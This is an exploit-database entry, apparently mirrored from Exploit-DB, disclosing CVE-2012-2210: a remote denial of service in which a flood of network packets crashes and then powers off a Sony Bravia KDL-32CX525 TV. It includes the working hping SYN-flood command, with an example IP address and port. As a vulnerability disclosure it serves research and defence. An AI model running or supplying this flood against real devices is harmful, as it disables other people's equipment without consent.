Sony Bravia Remote Denial of Service

vendor:

Bravia TV

by:

Gabriel Menezes Nunes

7,8

CVSS

HIGH

Denial of Service

399

CWE

Product Name: Bravia TV

Affected Version From: Sony Bravia TV

Affected Version To: Sony Bravia TV (KDL-32CX525)

Patch Exists: NO

Related CWE: CVE-2012-2210

CPE: o:sony:bravia_tv

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Sony Bravia TV (KDL-32CX525)

2012

Sony Bravia Remote Denial of Service

Playing with my TV, I found a bug that can crash the device. Running a hping command against a Sony Bravia TV (KDL-32CX525), all the functions stop working instantly. You cannot change the volume, channels or access any function. Instantly. After 35 seconds the TV stop working and back. This happens 3 times. At fourth time, the TV shuts down. In less than 3 minutes, the TV is off remotely. It is necessary to turn on the TV physically.

Mitigation:

Disable unnecessary services and ports, use firewalls to block malicious traffic, use strong passwords, and keep the system up to date.

Source

Exploit-DB raw data:

# Exploit Title: Sony Bravia Remote Denial of Service
# Date: 04/04/2012
# Author: Gabriel Menezes Nunes
# Version: Sony Bravia TV
# Tested on: Sony Bravia TV (KDL-32CX525)
# CVE: CVE-2012-2210

Playing with my TV, I found a bug that can crash the device.

Running a hping command against a Sony Bravia TV (KDL-32CX525),
all the functions stop working instantly. You cannot change the
volume, channels or access any function. Instantly. After 35 seconds
the TV stop working and back. This happens 3 times. At fourth time, the
TV shuts down. In less than 3 minutes, the TV is off remotely. It is
necessary to turn on the TV physically.

Attack:

hping -S TV.IP.Address -p anyport -i u1 --flood 

Example: hping -S 10.0.0.3 -p 2828 -i u1 --flood